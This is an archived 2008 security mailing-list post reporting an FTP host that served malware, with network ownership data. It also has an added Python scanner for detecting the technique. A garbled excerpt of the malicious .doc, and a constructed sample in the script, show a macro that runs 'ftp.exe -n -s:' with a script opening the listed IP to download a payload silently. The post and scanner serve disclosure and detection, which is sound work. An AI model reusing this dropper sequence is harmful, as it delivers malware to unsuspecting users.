[nsp-sec] malware FTP server in AS209
Daniel Adinolfi
dra1 at postoffice9.mail.cornell.edu
Mon Sep 29 08:54:50 EDT 2008
Folks,
Embedded in a .doc file that was identified through one of the NSP-SEC
feeds, we found the following FTP server serving up malware.
[ Informations about 209.201.88.110 ]
IP range : 209.201.88.0 - 209.201.89.255
Network name : ICON-NET-VDI-1
Infos : VDI
Infos : 61 Belleville Avenue
Infos : Bloomfield
Infos : NJ
Infos : 07003
Country : United States (US)
Abuse E-mail : support at iconnet.net
Source : ARIN
AS | IP | AS Name
209 | 209.201.88.110 | ASN-QWEST - Qwest
PEER_AS | IP | AS Name
174 | 209.201.88.110 | COGENT Cogent/PSI
701 | 209.201.88.110 | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
1239 | 209.201.88.110 | SPRINTLINK - Sprint
2516 | 209.201.88.110 | KDDI KDDI CORPORATION
2828 | 209.201.88.110 | XO-AS15 - XO Communications
2914 | 209.201.88.110 | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3257 | 209.201.88.110 | TISCALI-BACKBONE Tiscali Intl Network BV
3320 | 209.201.88.110 | DTAG Deutsche Telekom AG
3356 | 209.201.88.110 | LEVEL3 Level 3 Communications
3549 | 209.201.88.110 | GBLX Global Crossing Ltd.
6453 | 209.201.88.110 | GLOBEINTERNET TATA Communications
7132 | 209.201.88.110 | SBIS-AS - AT&T Internet Services
7473 | 209.201.88.110 | SINGTEL-AS-AP Singapore Telecom
An excerpt from the .doc file:
"c:\netldx.vxd" ?
"o 209.201.88.?110?"u? anonymou?pass @itsme@?c d inc??ng??ascii?A ?
H'ui???(? Shell "A?mand.? /c ftp.exe -n -s:?$, vbHi?d`?g3??K???A?ٟA=
cr?Ed32PMake sur?e`Pat so???cond c?q ?H t?| befo at we ?tin?ue?1ming?y?s?
f@(? ~X?1?AQq?2!
Happy hunting,
-Dan
_________________
Daniel Adinolfi, CISSP
Senior Security Engineer, IT Security Office
Cornell University - Office of Information Technologies
email: dra1 at cornell.edu phone: 607-255-7657
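The excerpt above shows the dropper pattern: a macro writes a short FTP command script to disk ("o <host>", "u anonymous", "pass ...") and then runs ftp.exe with -n and -s:<script> so the download happens without any user interaction. The following is an added triage script, not part of the original post or any Cornell tooling, that scans a file's raw bytes for that combination of indicators and pulls out the host, login and dropped file name. The regexes, the scoring rule and the constructed sample (which reuses the IP and file name from the report, padded with junk bytes) are all my own assumptions.

```python
import re
import sys
from dataclasses import dataclass
from typing import List

# Indicators for the technique described in the report: a macro drops an FTP
# command script and executes it via "ftp.exe -n -s:<script>".
FTP_SCRIPT_RUN = re.compile(rb"ftp(?:\.exe)?\s+(?:-[a-z]+\s+)*-s:", re.I)
# ftp.exe accepts abbreviated commands, so "o", "op" and "open" all count.
FTP_OPEN = re.compile(rb"(?<![a-z])(?:o|op|open)\s+(\d{1,3}(?:\.\d{1,3}){3})", re.I)
FTP_USER = re.compile(rb"(?<![a-z])(?:u|user)\s+([a-z0-9_.@-]+)", re.I)
# A Windows path ending in an executable-ish extension written next to the script.
DROP_PATH = re.compile(rb"[a-z]:\\[^\x00-\x1f\"<>|]{1,80}?\.(?:vxd|exe|dll|scr|bat|cmd)", re.I)
# Compound File Binary (legacy .doc/.xls) magic; informational only.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


@dataclass
class Finding:
    ole_container: bool
    runs_ftp_script: bool
    ftp_hosts: List[str]
    ftp_users: List[str]
    dropped_paths: List[str]

    @property
    def suspicious(self) -> bool:
        # Alert only on the combination: a non-interactive ftp.exe run plus a
        # host to connect to. Either indicator alone is far too noisy.
        return self.runs_ftp_script and bool(self.ftp_hosts)


def _uniq(items):
    """Deduplicate while keeping first-seen order (lists stay readable in reports)."""
    seen: List[str] = []
    for item in items:
        if item not in seen:
            seen.append(item)
    return seen


def scan_blob(data: bytes) -> Finding:
    """Scan raw bytes; works on the fragmented strings seen in the .doc excerpt
    because each pattern is matched independently rather than as one line."""
    return Finding(
        ole_container=data.startswith(OLE_MAGIC),
        runs_ftp_script=bool(FTP_SCRIPT_RUN.search(data)),
        ftp_hosts=_uniq(m.decode("ascii") for m in FTP_OPEN.findall(data)),
        ftp_users=_uniq(m.decode("latin-1") for m in FTP_USER.findall(data)),
        dropped_paths=_uniq(m.group(0).decode("latin-1") for m in DROP_PATH.finditer(data)),
    )


def scan_file(path: str) -> Finding:
    with open(path, "rb") as fh:
        return scan_blob(fh.read())


# Constructed sample (not the real file): the fragments from the report with
# arbitrary junk bytes between them, the way they appear in the excerpt.
SAMPLE_DOC = (
    OLE_MAGIC + b"\x00" * 16
    + b'"c:\\netldx.vxd"\x00\xff'
    + b'"o 209.201.88.110\r\nu anonymous\r\npass @itsme@\r\n'
    + b"cd inc\x00\x00ascii\r\n\x8a\xd1"
    + b'Shell "cmd.exe /c ftp.exe -n -s:\x00\xc3\xdf' + b"\xaa" * 8
)

if __name__ == "__main__":
    targets = sys.argv[1:]
    results = [(p, scan_file(p)) for p in targets] if targets else [("<sample>", scan_blob(SAMPLE_DOC))]
    for name, f in results:
        print(name, "SUSPICIOUS" if f.suspicious else "clean", f)
```

This only sees strings that are stored in clear inside the file, which is what the report's excerpt shows. Macros kept in compressed VBA streams will not be visible to a raw byte scan; in that case extract the source first (for example with olevba from the oletools project) and run scan_blob over the extracted text.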